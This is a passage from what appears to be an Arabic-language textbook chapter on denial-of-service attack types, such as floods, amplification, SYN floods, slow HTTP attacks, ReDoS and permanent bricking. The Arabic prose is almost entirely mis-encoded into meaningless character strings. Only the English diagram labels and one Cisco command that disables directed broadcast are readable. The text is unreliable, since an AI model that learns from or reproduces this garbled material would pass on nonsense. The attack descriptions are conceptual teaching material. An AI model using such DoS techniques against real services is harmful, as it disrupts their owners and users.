jl A qjT > >i Jj^a <j!^L^ j* jl <Lajlall L_axjJaJl Jalaj (j^^ia jC- La] jjn^N (jlajstJJ jl j£-<uJl jxa jj jl^)ll ^ * ^ > "I *^ 

(PURE FLOODING) cjULajaJI 4 

til^l^jjujl j <UI <J£ j* ^ j ^jjuj! cJ^jj ^ ^ > >i jj (jSaaI! j-oa jll j* Ajli^JI Ajs Loj jj^JI aaxII l^laj 

^AAjjll JjUajJl (J^ajC til!>l^lajV ^a j^Jfc j& ^a J^g-Sl lAA j .4_l^jJaJl Jc Sjfl jlall jL^ajVI A^fual <K (_£AAjjJt (jUalll (J^ajC 

C5 i& JaULJ jj^*ll ^ jaJI jl dii^ ^ j^SI Iaa A^a ^liAll V 4_i^all .(bandwidth consumption attack) 

Ao\\ A. ^1 ^ ISP j* SAcLoixll ( . lilaJ 4_l^jJall jLl^VI j* 'Ia^Aj .4_l^jJall 4£jjujj ISP j£ t^lLall -^Ij 

(ISP ^f^J 4_LiuJall lajjj <_£a1I " JaaxII jjjIj jtgV JflVl Jc) <a ja^Jl j* LJajl 4-riuJaJl ISP J^Ij jl c_fl jlLlI jjc j* l jA 
6<Jtlall <J-1Jjuj Jc) Sjlilil! j AjA^jII Ia^. cJ^-^^ JJ^>^^ ^^>^ ^ tdiVl^Jl (J^asu <j^LkJl 4.1^. jiill ^jlila ^)JajJaJ 

lA^. L-lau all j>» UJ^ ^ 6 C5^>^^ ^ .(255 L>^ IP <J J^J^ ^ ^ ^ I^JLuiaII J^*JI ialixJl bjl^ UDP ^^>^ 

jAjJ (jl (j^J C^^J 'DNS ^1 jljolfllojl (JJJ^C 4(JH<Jl J-iJjuO ^^5^^ ^5 ^ laJLuJj jl j£-*J (^31 D^A^xJI <xi^Jl (JJjIj <J j'^ A^A^J 

.(4_iCjj^3l ^jujIj jUaJ HTTP ^Ul^ C> U^J^ ^uall J^b qa 4jcjj^ D]\S J >>iqu.il ^ AjAj l^jUj 

(Jj^J L_fl jjoi ^ji^jJall ^!>LftC JJ^ ^^>^- J 6 ISP ^jl J -0 J ^ > ^ill ^1 jjoj Aa. ^^ic illjLj jflJ L_fl jjoj ^\ lal > njj 6jlili3l jU tli^ CjA^. lil 

,*L<iAkJI L-ia^ ^jjjIj (j'qVijj 6 jq> ^ill ^1 

(Attacks Targeting Network Resources) ^jlj^ (Ji^l^j ^J) cjU^J) .1 

c^j 'Bandwidth Attacks j' network floods cs^ 5 ^j^' 6 ^ CjU^SI a£j^13 c^jny] 
sj^Vl ji jjj^II s j^i jx cJVVl c> u£ ^j^^ (yjj^ ^ '"flooding attack" aj^jajII cjUU^ill ^ .^SUi l^Sl 
jAii as Igil j^ J ^j^juJ Ai^LuJ! ;L_flA^jjab<JI jj^JI ^^>^ j -0 cJ-^j^ ^iaLouj c^^j — botnet - ^ 

IP CjlkJa^ ^a ^'iun JL^il jjAj Jj^jjjjj Datagram Protocol (UDP) Jj^jj jjJI :UDP Flood 

l Qt > ^ <Jaij cJ*^^ V UDP Flood (* .(<^iL^a>Jl A-lLftC t . lilaJJ V ^UlUj) jjjlgjaJl jJJ J-ftC 4 uila pLuljj <^.LaJl jj^ jL^aj!>l! 

^Ac cJ^j] j -0 ^—^^ J .^A^laui]! A£jJal3 4£jjuo3! ^aL^.^ jl ( . Ujujj] Ci5 i^J cJ^- ^AlaJt til jIjuoII ^l^lj 3 lal - mjj toAAa^ 

j^ta jjc. A£j^J| £>A& C5 iljJ ^a^Lkll .L_flA^ll ^LaII C5 1c jJaC ASLLaI ^Jj^ UJ-^ lU^-^H J IP U^J^ L>^ UDP CjUaixLxi jxi 

V <j1 a£U ^j^j "destination unreachable" ICMP f> J^jV '^J^ ^ ^ ^V^j 

j^) Mbps <^^ll ^WA? UDP Flood ^ 'volumetric attack ^ .Ai A^J I ^1 jA\ Jl ( j r x^ a^ jj 

.(packets per second) PPSj (cs^jSlI (jUaill 
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cjUL^ ^^L-j JU^j! uj^ > Internet Control Message Protocol (ICMP) JA^jjJI :ICMP Flood 




Attacker 




UDP Flood! 
Bandwidth saturation 



UDP Datagram 



OOP qatsKS^-— — -"V-"- 



Victim's 
Web Server 



Bots 
(Infected Hosts) 




Ltt Jc, fii ^ >j (Ping Flood ji) ICMP flood 'UDP flood ^ lM > ^ ^ .^Vlj <o^£]lj 'IP 

£ jj ^1 Jc^ ^ jiaii jl c j&aj ICMP flOOd c> L3^^ L#*"* 4 » ^ 1 c> c£l Jc- A^Ixj V 4 li* j .t flajJal l 

^^3U c^L^ jli ^SLII Jj ICMP jj^ c> J^ u JL-j] .ICMP_ECHO * ICMP J*L- j c> 



"volumetric attack" ? ^ j* ICMP flood .^Jl c> u 1 * j^ 1 yu c^ja ^ tt-JJa J£ *aJl**l <J jU^ J 

.(packets per second) PPSj (c^jSil o^j^) Mbps J cjjUjaIL 

.TCP/IP <^^i\ c> 

cj! jfill ^ ^j^j j cjIa^ ^ ^j^j] ^l^VI J Internet Control Message Protocol (ICMP) ^ v^ .. n 

JL, jb ^^1^13 ^ ("ping") ICMP_ECHO_REPLY P >ll 4 J13-JI 0^ c> .^j 31 J^ 31 ^j- JIJj— jU 

,UIjI CjS jl! <jL^jjujI Jc <J jj^^JIj jll ^Uaj Jl 



Kg** 

_J ICMP is a ty pe of doS a trt-a c k. in 
wri i c hk perpetrators send a large 
number of packets with fake source 
addresses, to a target server in order 
to si rash it and cause it to stop 
res pond ing to TCP/I R requests 

I 



After the ICrVlP threshold is rcachcc, 
the router rejects 'Further ICMP echo 
requests from all addresses in tf>e 
same security lone for the 
remainder of the; Current second 
and the nex.t second as well 




CM<1> K^qii^C 




ECHO Replv 



ECHO Replv 



LCI iO Kc que &t 




JjS ^^l^jj ' jaj JL-flSl uj^ dA^jj* j* Internet Group Management Protocol (IGMP) djfrjijjt :IGMP Flood 
IGMP Flood j jj^JI jjjI jll s j^l JaJ & Sj-ajll ajja^ t*Sjj jt I ^L! (jjjI j 3 ' s jfr^j j^j^f^^ s /P hosts 

IGMP J^J^ L>^ Cf^* (>< ^ ^ - ^ jiaJJ . ^xL<l> talll L_bud^ multicast IGMP t( flxjJall JaUj ^^Ic- ^ajli JJC. 

(Amplification Attack) f^UaSll cjU^a .2 



^jlk^ (JjLuj j JLuo jV broadcast IP address ^> s^lii^Vlj > ^11 jjjI jll ^^^^^ 6 
Smurf Attacks ^ > ^'^ c> *^ j^-^^ <S^VI c>j .^-i^JI IP Jl ( ja^JI ip jljj^ Jj <j| J IP 

.(UDP amplification) Fraggle Attacks j (ICMP amplification) 
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ICMP echo request f J^jj j IP network broadcasting service 
^ ^Saj^ j 4£j^3 (multicast address) jVI IP ^1 ^ 



ICMP ecfio replies 
(destination = victim's IP) 



ICMP jj^ cs^ 0 cJ-^ <iajjoj jll a£jJJI ^3 lij a j^Jl jj^ 

ICMP echo reply >JI lUjjj ^ ICMP echo request 

jj^, ^ Inn jj^l^JI jli t ^jauJal l j^J ICMP echo reply (O^ 

.ICMP echo reply ^ u' IP jl jk. 

^ N ^ Jjj ^X^A\ JjS lUjj ICMP request l£ ^ 

jjjjj) "reflection" oA£*jVI *Ijjuj ^ c_a ^ ^. v^un .4-kLai jll 
jl 11a j 4 (ip broadcast ^ > afl l j (j^-aJI IP o^j^ 

i^JUII JUJl ^ L£ <no ip directed-broadcast subinterface >>VI ^l^i^U IOS JU^ ^ f j**^ 

Router(config)# interface GigabitEthernet 0 
Router(config-if)# no ip directed-broadcast 

<jl jlkl 4J ^ t^l^al! jjfL 'DMS amplification j& ^ > ^ j c>A£*jVI <>» ^ ^illj ^ j^-U j^l 
^SLII IIa cjIj jjjjII (jjjia c> J ft j^L* ^^Ui^VI lU ^ ciLJI (cache) oj recursive DNS name server 
J£jou l^ikjjaj) <!Lojj cJ^jj ^ ^ . diSj^JI (jj^^jl! < aLq t . \\\~\ L_Jia ^ajL ojj^ ^recursive DNS server 

c> 32<000 c> j^i c> f j*^ 1 c?j^1 ^ '2006 ^ A^jl l?^^ DNS amplification f W VIS* ^ 
f3 c>j authoritative DNS server ti^j^W Vjl ^W^ 1 ^ .^j^ 1 recursive domain name servers 

IP u^j^ DNS ^W^ 3 jV ^jjjjII ^W*^ K4 f^LaJI resource record (RR) 

^ open recursive servers . JI>J3 t 0 pen recursive servers c> ^ ^ j^ > ^ t 

^jj dijU 56 DNS . ^^al] ji£ ± jj* ci?^ ft^ j '"cache the result" A yf^W ^>J1 u^j^^ ^ Jh 

,^ikjja!i3l ^j-<i 72! 1 (jj'^'i j 6<jL^jjojV1 (j* ^—^^ 4^028 ^^^j ^ qu^^l l^jLuijj 



^1 compromis&cf 
server 





,■4 f&rg& nurt?£?&/- of open 
f&purstv& D/VS risers 
j^.te ojt the internet 



Query once, then cache 



Compromise an au tho ritative 
DNS server and publich cl 
large Resource Record 





Botnet sends DNG requests with* 
Ihe victims's address, asking for 
the large resource record 



1 1- struct cotret :o Ic.Jich attach 




( 3 f>. a < ft JL^ajl ^njnj V jl ^>^1 a\\ l^ja ^ajL ^^jll j j ; Connection-oriented attack 
. JL^iVI tjc SaxuslJI cjU^J HTTP ji TCP c^! ^^la^l CjU^I .^nKM) jl ^^UJI ^jl ^ ^ sjIc jjjj ^j^J! 
^WUj t^^ujall Jx»\£ JL^sjI ^iil ^l^ll £^ V *c5 j^' i> 6 J^j^ uj^? Connectionless attack 

. JL^I DDoS j> ^ ICMP jt UDP CjUL^ 



(Attacks Targeting Server Resources) ^l^ll ^jl^ ui^l^j ^211 cjU^JI .3 

^ u ^ijl i QgH ^aUI cJ*-?^ 



4 https://www.facebook.com/tibea2004 
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.^>S IPSSj u'j^I 
(TCP/IP Weaknesses) TCP/IP ^ 



client 
host 



time 




time 



server 
host 



J^U j* TCP/IP J>j^jjj f ts^ CjL^1\ & %\ jjVI 



^aj TCP/IP JAwjJ ("flags" ^Vl _,!) ^li 
c^UVl JJ t> URGj 'FIN PSH 'RST <ACK <SYN 
jSA,jJlj UDP J*- .TCP/IP *S>»J M*H 

jl ^ J '(J^^l J^ ^^^3 4<Jtj^j| (JJdJjujtj jjAj 4_Ajla3l (_£^)^.Vl 

(ACK 'SYN-ACK <SYN) "three-way handshake mechanism" <£^l UL— II *J TCP/IP ^ . p >JI 

2L|fl JU&I jfe j .(ACK) j JI jl JI fS t>j ^(SYN-ACK) v^l Je. jjl! ^ *(SYN) c J 1 ^ 1 r -A ^ ^ 
cJ^jj Jc- lS ^ J TCP/IP l! j^j^ ~l jaJLujI d^Loj! cJj^-^ ^ f .Laul ^3 ^>fi*j <JL^jVI jli 

TCP SYN Flood 

J TCP J^c- ^j^j J .O^j Jl^VI Jj^ l£ j£ ti^l tilUA jjfL jl L-iaj <TCP -J 4iD£il ^iL^l 4.JI J 

*!>U*JI <SYN Flooding ? J 'TCP SYN ti^VI 11a '^j>» IP *m 

DJjL<Jl TCP ^^^-f ^ TCP (> *^ (j-Q 4_LalLaJ (JA <CjJjab<i CjVIj^jI (jjJUaJ ^UjC^l! ^^Lkjl 6^UL (jj>»jlj ^IA^I^xJI 

(jjlkAll (threads) ^^Jl ^iLJI ^iij SYN ^W^ 3 cJ^ lW-*^ .^Kv^ IP o^j^c ^ <-^ta ^SYN 

IP ^jU^ jV jSlj 4 JL^iV! cjUlIaj cJi! jj^V! ullal ^XixJ! ^ j jU SYN-ACK J^jj Jj^ ^ . JL^£U j^^H ^LUxJI 
Jl jj V .^IaJ! 6^ IajI L^JLuajj ^jj ^jl (ACK) ^3^- 6<jL^1ujVI ^^c- ^jjj^IS jjc. ^!>Lac jl jJii-^ ^^IaslSU <j^aLk]| 

SYN-ACK ^> jj '^Vl Jl^iV! cm j> Jil ujl^Jlj j^JI ^ (threads) 

^ <JjU SYN Flooding ls j^v ^ j <; w « ^^UJI jjl ^ l-AL ^ jaill Jja CjI^ s^c jii^^U 

^ j L - J W^ a <J j^j ci^ cjUlkll jiiLd threads <1^a3! ^Lkc] Jc j^la jjc. ^Lkll & JL^ajVI CjUlla 



Legitimate 
User 




Attacker 



__SYN _ 
SYN + AC^ 
ACK 



Legitimate 
connection 



^ttack_S\^Ns_+_s pojrf ec^ SR C_ IPs 

I::::.::::::::©:::::::::::::: 



— 



SYN Flood 

attacks 



Open threads 
for each 

SYN request 

Victim's 
Web Server 



e >J} JaUj j ^SYN ^ TCP Jj^j^jjj cjVU^V! c> ^£ JUj] 6J U^ ja ^SYN Flooding lij 

" Jf^all" HjjSjSI £>iA A^lsu t^^kJl L-±a^ J tjnnn Ja.t jx j .AjauJall j-a c5 J^? SYN/ACK 

. jilxj U ^ J^l ^ ykA\ J^l l^lLi J SYN/ACK 'ACK ^ j jU^I J J!j^ V Jl! 'TCP c>-^ 

JLoijI Jc^ IjjlS ^l^II lili O d£j J ^iij j£dj ^UJl J TCP CjVIj^I jl ^n>>nj .djU^kll ^J.^i3 

jxj ^ _^LJ| j-d AjL^JjojI Jc J ga^i] Jlj t . ilia ^1 ^1<»J I^A Jj a1 > nj J jj^ jll j^j ^-jli 'SYN ^3^- L>^ J^ ^ 
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(ji^j ^1 SYN Cookies ^ l^i^l c> i> ^ ls ^JLj^ .<4?^ o^j 

.SYN Cookies t ajl h j ^l^viml t . ujuaj ^Lu^ <J-*c t . illajj t^ill j jLojVI ^Ia^j mU .^Lkll ^j^Li* J\si 

6 j^Vl £>i& .t qjqViH j c Loj^I] 6^^a3I ^aj^a^xJl 6 j^VI J jl^ J^Lk ^ tl j^j SYN Flood S^aJI (j* * Liaali ^ <j| tAjlgill ^ 

.DDoS <^^^ c> ( Liikjll j ( 1^ <JUi j 1^ aJUJI S^J jll jj><J1 a^j^ Cjli o3 J*^' J " ( *j^V 

TCP RST Attack 

^ J^Iil ^VJl ^TCP RST ^ .<Jil*II TCP ti^ ^ ^ J 1 ^) > TCP RST ^1 c> ^j>^^t 

j)^a\\ ip 

^ISjl ^ ^SLII ^j^JI t_flVVI Jl^jV "botnet" ^ U s^lc .(^Jl U^^jj ^ ^ J^*^ 

Legitimate established TCP connection 




Legitimate 
User 






Victim's 
Web Server 




Attacker 



TCP PSH+ACK Flood 

"Vi^" J Ijja t^j] TCP J yr* ^J r ^ U 1 ^ '1 (Ji ^ ^ PUSH ^ TCP ^> lU j*Jt lUjj 
.lUxJ! liA JUi^! ^ ACK jV TCP c>-^ "buffer" s jSli ^UJI gSI jll ^ ^1 j^V 1 ^ -TCP 

^jjj^d ci^^ l!^" .CjUlkll d^a ^ ^jaxJI ^ l^^JI ^aLJI (jljc.) lA^j '"botnet" j^jj^^ f ^ 
lw "ACK" c-iljfcVl ^ J cjUUl ^JU. j^li aI*^ Jl ^jj, ^jll j-VI fiUl Jc. TCP stack buffer 

® | 

TCP flag PSH =1 




Attacker 











TCP flag PSH =1 













TCP flag PSH =1 





— — 


• 
• 





PSH= Server forced 
to empty its buffer 




Victim's 
Web Server 



https://www.facebook.com/tibea2004 



1062 



'Low and Slow" Attacks 



J c_j jj*JI c-fl, ^ n . n l&jl ^>t>s 4-±*£> L-jllajj V "Low and Slow" < "Flooding" > ^ 1 

< l^Ja jLoj J t . UjujJ L_flUaxJl J iftjLjalt JJJ^I ^J^ L>* b- u1 * 1 ^ JJ* > ^> L_fl^Jl ^LJl Jc L_a*jJa3l JalSj jl ft^Aa^a <^ > 

cjiij ciiVl^ajl Jc- jJais lgiL£&l l^a. l-jju ^ajj ;(^LiJI jjt ^ ULaJj) el illnlajli jjl ^ < fl^Lujj cA A*\ts "Low and Slow" 

■vj*J« " J-^*^ (jl j$-Iaj Jll CjUUJI 

Sockstress 

J .ci^JI 3^aJt ^ jUj^JI ^ (jLkJ jj^l^l] ^LuJ] TCP J c aajjall Jalij Jilujj ^ sbl ^ Sockstress 
Jl Jj-uJI vjv-j 'SYN-ACK vjv-j <fSL*ll J] SYN ^> lUjj J^JI 'TCP J ^UiL^JI aJI 

fiUI ^ TCP Jl— 31 Sockstress ^mA* ^ jL . JL^VI o^ttf <4tt j <ACK ^ SYN-ACK 

Jl TCP siaLs ^ iafjJ CjUAxj l^jlLftJj «s jj^Vl ACK J^b ^SLII Jl "window size 0" ^ >> uj^ j^ f*^ 3 j 

jUaVI a Jia. J;!^ .(Jg-Uialll Alfla Jl tg-xSj ^lijl 4 aILolaII CAjLJI (jj^iaj ^£^1 (j j^<Jl TCP .CIuLj 0 

"Windows size" .t>j^ t> l£ J oj J^2ll J CjIj^JI ^ j^l U "Windows size frame" 

jlxjail J^ djUUJl (j-G .ljj-<Jl (Jl^jl (JC* ^—^J^ t ♦ 1 *> J J^ 1 *^ ( ♦ utaJl (jl j (J^UaVI Jc- V 4jl ^^-^J J^^ J) ^ ll^LJ ^JJ 

jl c jLaj J^ 4i jl ^lAj JaaxJI Jl "window size probe" <jy*^ j^V^ ?J*> ^UJI jj <!UJI J . j^l 

^jAslSI ^jfl <j!>Lk (j-d -C5 ^joia JJC. J^.l Jl ^ j3i-d JIj^jI Jc JaliaJl ^aJJ 4 jUaV! a JJ*J V g aSI (jV (j^J <«— J*-^ 

j 6 (lSJ^^ J j^^^ j) TCP J^3l Jj^- J 4aI>.aa11 c^II^Lujj ^l^JI (jla Jl ^ jill ^ CS^L^1\ ^ 

t^CliU 4 Jl J^) l^ JJ* > ^ J^j a ^ CIjVIj^jVI (j>» ^JAslSI ^Jfl g <J] 'Mjl^J^ .cJ^-— 3l (JjJJjujIj (jx» (jjJCjjalll (jj>i^Jjaa>Jl 

ft J3 jldll ft jSlill c%La£5 ^ Jill I 

,<>i^Jl (jxi (jLd^pJl Uiajl ( ; UjujJ Lq-q t^^LkJl 



Legitimate 
User 




Attacker 







SYN 









SYN + ACK 


^ 






ACK 








@ TCP Windows Size = O 























^ " ~~ 

^ " 




^ TCP Windows Size = O 




" 




_,_@- p x 0 ^%::::::::::^::: 

T — ■ — ■■ — • 

• 
• 


^11 



Connection 
e stablished 

Client says: 
It can not 

receive data 




ictim s 

Web Server 



SSL-Based Attacks 

a<^A CjV j£ jjjjj i all^Q Jjs (j^ ^^kiauJI j;iL^i3l Aijjla 6 (SSL) "Secure Socket Layer" ^ILJI <Lla ^ ^ 
JL^iVI (j^^Lai^ll <>Vl jajjj jlajll <^U3I (> TCP/IP ci> SSL .W^^ 1 ^ jj^l^SI Jllj 4^ ja.Vl cjVU^jVI 

>laJJ SSL J^ ^J^l ^AiJl L. djLftaA .L_fll^)JaVI (JJJ lI*^ 3 ! J^l (jjJ j3 J ^jV^J^ajl JJ$ >*>^ (J^-k (jx» (_^^kl CjV j£ jJ j^)J 

^ jliill a^Aaxj Ailxl<JI t^jUi jll j^xj J^UIojI jl tSSL ^^l^JI Jj 4^US1I diULull JLuijj ^SSL handshake y ^-al.^ u»l 

a£ J^ DoS jl <LLouj Ljaji (j£^j SSL-based attacks .SSL j^Jsll ^15^ i^UJI 

^jl j>» (j>» J;J^ j5^l i^-J AjV ; M 4_SjL<LL<i j;ic." CjIa^JI d^A JIa Jfi*J La Ullc. Ajliil L->au ^11 (jxi 'SSL ftJ^L<JI 

.ft^lj <jpiy (> jj^I SSL J^ fftfl eJ ^JI ^ ^Lkl! 
Encrypted-based HTTP attacks (HTTPS floods) 

(jx»l jjJCj JJJ-<JI ^J^- JJ° uH3 Ala J ^j| jld j^J Jc (4_Ldl (Jij Aifla) SSL/TLS " ^^ujJ dljjjjVI Jc CjI^JjuJI (jx» ^jAslSI 

jA Lo£ <^jJal j C-Lau] l^_L<i c Ljaall j ^lijjVI J i^u ftjajuLAI jjj-<JI ^j^- Jc- ^^Jl ^ CjLa^a .AjI^_i3I Jl AjI^-JI (j-« CjUUill 

.ftjjjuLdH JJJ-<J! ^J^- JJ^ ujJ ^ t . lllaJJ 4J| La£ 'S1S1L JJJ^ ^J^ 1 (J 1 ^^^ V £Sl jll J DoS c ajflaull ClaLiai jl ^Jaa a jld 

J^ ^la sj^lLo CjX^ eJ ^j| J I ji£ cil jUj (jVlj ft jLUl HTTP jjj^^ ^ j^ cjULj^ - HTTPS floods 
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jjjj&at cjUI JS* fj j^Vl cjU^jII ^jAxJI t bjjaj s jLUI HTTP <HTTPS floods -S j^^ J .< <»>^l ^ 

THC-SSL-DOS 

^ j^LJ cjLjj) l^i^ajj The Hacker's Choice (THC) j^l i> ^ t> ^ j^j^ <^ 6 ^ 

'"low and slow" ^U^JI <> U ^ JUI ja U£ < THC-SSL-DOS SSL ^ c> 

SSL handshake e^j^ 3 6° J^j ^ J] ^ i> lA* yr^ f t> 

i A\^uA SSL session handshake cjLuk J£ jV 'SSL ^^1^5 Jll cjU^JI ^ uj^j o^W^ .f^' ±Jj* l£ 

.dljjjjVl Jc- 4i j-GjJa^Jl SjJj£ll diUi^Jl (J-g <Lal£ itjj^ -LaLLajj jj jjjfl^l S^-^i (j-a .JjAslU (j^^Jj 'SSL <La£L 

(Attacks Targeting Application Resources) Ja^l ^jlj* (Ji^iuu cjU^JI .4 
'SMTP 'DNS ^VjS^i jj^j HTTPS ^ u^j 'Hypertext Transfer Protocol (HTTP) JA^jjj o-J cJi^ 

cJ^lun ^311 CjU^JI Ullo .^^kll CjU^J ^UmU ^J^Ulail i qT>h Jalij cilll^ ^( ^ j^Vl Cjllnkill j t VOIP 'FTP 

6 ^ ."low and slow" j ^ ^ 1 ^ 'sjj.^^ ^j^ j* c ^pll cjUl^JI ^ Aillk^ ^1 jjl tilUA ;a£jJo3I jjl ^ 

^SVl Cjliukai JjSjjjjj ja ^HTTP. HTTP J jS jjjjj ^ < ^»^t ialij c_JUJI ^ cj>^iun j t^U. sjjb ^ s jj^Vl 

HTTP Flood 

(j-G <C ^ 6^ JJJoui (jj^J ^-jl (^5^ jAlJ Uui jA j .(jjj^ ^jl t V^lmj j Ic jJjoi jS^Vl (JjJJ^ J^A ^A HTTP flood 

cjUI > ^ cjU^a ^ j .l^LSSI (jT»^t t> J*^ ^ ^SL ^JL-jj POST J HTTP GET cjl.nK It CjUIL 

Jl^j ji^i^u c_Jki j (.(volunteered machines or bots) sj^l ^ j^Ij cAj J SjIc HTTP flood 

CjI jj! .^j^JI ^ u^j^ ^ (jjj^l ^j^ ^Un»nlj i(HTTP GET flood) ^y^W £ ^Uq.n Jj^" JJ^» 

djUL-^il Ja CjIa^a ^IjV ^l>ikiaaVl <1^uj aIloj j j^jj High Orbit Ion Cannon (HOIC) u^j^ f 

"multi-threaded HTTP flood" HTTP 



C&C Server 



BOT 

Command 




Bot 

(Infected Host) 



■P. 




I 




Bot 

\ ^ x ^ s (Infected Host) 



1 \ 
1 \ 





§-^I T e_GETReq Uest 



Bot 

ed Host)® ^ Hea^ e ?^ 



Attacker 




Bot 

i( Infected 1^3^81 





Victim's 
Web Server 



DNS Flood 

DNS j^ 3 <l£ djULu^iall CjU^a jo (jjoii bUl^i j .l^io c-kju&ll L-j«j^a]| ^ jSl j tl^S^Uaj cJ^Ji c> DNS flood 

^Aa^LujJ <J j£ jj j^)J (DNS) J 1 ^^ ^aUaj .DNS ^ A^ 3 L>^ *^J^ J^jj (J^^ 3 DNS (JJJ^^I <J c * q 'V^ t>1 J 
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ijc> J $ j^L* A^r^W DNS ^ DNS lUjj 'DNS flood ^ .(TCP ^) ^Vt^il 

"Low and Slow" Attacks 

"Low and Slow" u' c^) c^f^ *Jj*i ^j^kJI 4a. j ^^lxli ^ail! 11a ^ "Low and Slow" ^^L^k 

<jl A miK ^->lg ^.alhj txua *<JJ*-a (jjj^i L_a*_jJa3l Jallj t V^Wi "LOW and SlOW" ^-iLaaJfc f^Lklj Jjl ja C nul <LLuoll 



a( ^Cjjl (jL^aj! <j^Isl!I Jj^>^ ^-^>^ 

Slow HTTP GET Request 

jjIj-g ^Ja« a jl ^^ic (j-<u^j Slow HTTP GET Request 

.l^Il^jj ^ ^jII cjUUJI 4jL jkiijj JU^jVI cjUIL <> J£l J^ilo ^jjja ^ ^ill t^UJI <Lu£o jjc. HTTP GET 
jpl^l 4J cj^j Vj U JL^»jV! jl t> j£tell sj^-o Cj! (^c^j) HTTP header ^W 3 ^ J^j) ^W^^ J >^ 
J j^a. ^ j 1 ^^ <a.LauJI ^UiLojI ^1 c^-^ A^Lkll j t^j^Jj pJaiJ J^ 3 ^ <jjHaxJI djULiJI 4jL ^jV j ."time out" 



Apache opens a 
thread for each 
connection request 




Victim's 
Apache Server 



Slow HTTP POST Request 

CjUIL jjj cJ^il c_jjj31 ^ j;iUu3! lA^IU ^ ^1^3! t S low HTTP POST request ^ ^ Ja.i ^ 

JUJI l& m cA^ cJu t^TnVi JSAj ^JU-jj ^> V^j 'POST J^jj ^ .^^1 ^ c> s^j 3 ^ HTTP POST 

D^J^aJl CljUi jlx-<Jl ^j-d ^—^^ (J^ J^jj C^^ 3 (^-^^ ^ V (t>1 j;^ J^^^ j^'^J g all tfi^^iaill HTTP GET 4-llJa ^ 

POST s-^m jlkijVI c^j^ jUa. 4jJ 'POST HTTP uj^>>»^ ^ t^UJl .^uksi> Cj! jjs ^ 

^JUlUj cSApaJ! djUlkll ^ Jxilxjll C5 lc j^IS jjc. c fl^J) ^LJI 6<a. jjLJI CjVl^ajVl CjIIo S^c axjj ^ jSLftl! JL^ajVl IajI 




Attacker 



® 



HTTP POST partial request request header; 
Message size "content-length" parameter is set 



1 byte 
packet 



CD 



1 byte 
packet 



X byte 
packet 




The web server 
opens a thread 
for each connection 
request + makes 
note of the 
content-length 



Victim's 
Web Server 
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Regular Expression DoS attacks 
ja j j lUjj ; j^J-^ ^ J ."ReDoS J" RegEx DoS ? yr* j "low and slow" <> 



;<!UJI <^UJI 6 jj^ii<JI "library" J c_a»_jja ^j^j yr^ (evil RegExes ^-p^ yr^) 
jjljJI <> CjU^ iA\fu^ ^UJI/^SLII Jx^ ^^jj "regular expression software library" j^U^l ^Ijj 

"regex" Ajilaiall j^lxiill cjULac. ^iiii jl t^iklouJI ^ ^^LJI d^A.iaJI Jc "regex" Ajikiall j^IxjII l-j! u^J <U jl^all J 

.a^I g all 1 ^-iLoJ <J^J "^jl *J£^ till^LuJJ ^all 4_jaJaxl<Jlj o^istxJl 

Hash Collisions DoS attacks 

(jjjlg-ll Jjl^. ^LauU ^ jll Cljlkiflaull ^1 j^. ^xlaa a t jl - galkl j .L-lijll J^nlaJ J AjuLoJI CjI^suII l * a ^'"J CjIa^JI ^ jill b& 

"/ms/i collisions" i>M ^j 1 ^ uj^ uW^ 1 Jj POST session "hash table" 

<^JUJI ^ JL^] * ° jlj^l ^I^IojI J Collision resolutions .^JSLuJl J^l\ ^ jj ^ 

t> ^u*^ ^-^-^ j POST <^ j lU-j^ ^tg-^ 'Hash Collision DoS ? j^JAh J .^J^ ^Jl^J <j j£ ^>JI 

J£joij <jL^jjojVI jjg^* J jlaliij ;^iLJI ( . ul a Jc "hash collisions" o^-6-^ ^^^2 ( ; ujujj <L^)laj I&jUj CjLAlxJI £>i& .CjLAlxJI 
jjukill ^Lk ^ jljx iiiLajj oiAj t^lj ^aAf* jjj^^ jlf^ c> u^j ^ Hash Collision DoS . 

"Other Technique" <*>i .5 

Peer-to-Peer Attacks 

^ jzJb Alll .nil ^^1 ^UakVI l^^c (Jjujoij ^.l^xJI g II ^ill 11a ^ Cy* j& •^ill ^\ ^ 

£^ j '(Direct Connect Protocol) DC++ Jj^jj^ ^^1^ <^ yi *^ j^^J! c_j jji*^ u^^W^^ .DDoS 
^jUI) ^ j^JI (Jjj^c ^^Sc j^Jl ^ "botnet" j^jj^^ ^^" Ui \i ^ <*-L<^-II ^ ^ jjII I^a .Ajjjil! <LojI ^^31 ^^Iac ^ djULJI J^lib 




r ^ 



Li 



Attacker 




User-2 



User-l 



Permanent Denial-of-Service Attack 
?yn^\ j^Aj ^ .Plashing (PDoS) "Permanent denial-of-service" c> cjUj^JI 



6 cP jj^V^ ^J^^ (^W^^ tASjjUl ^ ^ ."bricking a system" ^ j*^ ^l^ki^U ^ jUJI ^ j^SI b^ 

^Laialj l^^ 3 CP" 1 ^ Sjj j^ll ft CjIjj^j djlAjj^ja ^jiajc. tdjlljjj -IRC ^^^^-^ 
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Ph fashing 



Permanent Do5, also known as ph lashing, refers to 
attacks that cause irreversible da mage to system 
hard ware 



Unlike oLher DoS aUaeks, L sabotayys the system 
hardware, req uinng the victim to replace or reinstall 
the hardware 




Bricking a 
system method 




1, This attack is carried out using a method known as 
"bricking a system" 

2, Using this method, attackers send fraudulent 
hardware updates to the victims 





3*nds- email. IFLC charts, tweets, post videos 
with fraudulent rente rtt for hardware updates 



Attacker 



Attacker get* acce» to 
victim's com pu !sr 




Victim 
|MaEcioiU5 code is #Aecij led \ 



Zero-Day DDoS Attacks 

JL* J jj^I^J] ^xuoij j£\ i^JajVl yi < «» > ^ t Jails ^ j , one-packet-killers ^ Zero-day DDoS attacks 
^jj^al jjUi ^ ^1 jjVl *>i& ^Jjujj .4 aiaia <jV djl^j^ill ^ 6^.1 j Lg U^j La-g '"black market" Jiiaajj 



J Resource consumption [ 



CPU 



Memory 



Basfe types 



Corf igu ration destruction or alteration 



Physical destruction or alteration 



I/O bandwidth 



Disk space 



J Ne:work bandw cth 



Multiple resources 



Exploited weakness < < ] Vulnerability-based DoS 



A ttack distrsbu Hon 



\ Flooding-based DoS 



-^ | Single-source DoS 



DoS Attacks 



\ Distributed DoS 



Attack target 



Attack enhancing techniques 



Reflection 



\ Amplification | 



Vertical 



IP address spoofing 



Attack traffic dynamics 



A ttack impact 



Disruptive | 
Degrading I 



1 


' — \ 


Constant rate | 




Variable rate | 






: . sire | 



DoS on Application 



DoS on Operating System 



4 DoS 


on Router | 




4 DoS 


on Connection 




| : : ■: 


on Link | 



DoS on Infrastructure 



DoS on Firewalls & IDS- 



Network layer DoS 



4-uIa ls 2li^ 



1067 



(BOTNET) aUjwjM 10.5 



